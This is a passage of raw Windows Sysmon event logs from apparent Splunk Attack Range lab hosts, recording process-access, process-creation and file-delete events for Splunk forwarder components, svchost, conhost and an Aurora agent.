Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015275Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.530{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35C-63C7-E401-00000000B002}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015274Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.530{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E35C-63C7-E401-00000000B002}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015273Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E35C-63C7-E401-00000000B002}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015272Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015271Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015270Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015269Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015268Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015267Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015266Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015265Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015264Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015263Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E35C-63C7-E401-00000000B002}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015262Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.366{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E35C-63C7-E401-00000000B002}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015261Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:32.367{E5A8D418-E35C-63C7-E401-00000000B002}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000039992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.462{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E35C-63C7-0506-00000000AF02}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.462{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.462{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.462{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.462{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.462{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E35C-63C7-0506-00000000AF02}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.462{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E35C-63C7-0506-00000000AF02}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000039985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.463{FE4C2B44-E35C-63C7-0506-00000000AF02}5564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000039984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.368{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E54D6D9CAAD3FBC35174BCB3AD5E6EAA,SHA256=53754D874BC7B15DED523E371AE6759AC3521BE521CA9F62159D80851404EA29,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:32.188{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 23542300x800000000000000015294Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:33.921{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=624B93DFA9C912D9DD0EBBDD51F70187,SHA256=2EC28E5032D34D330160843FAAD536DFFA7FD7014B28A358F186F3092562EAC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000040013Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.929{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E35D-63C7-0706-00000000AF02}5176C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040012Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:33.929{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYST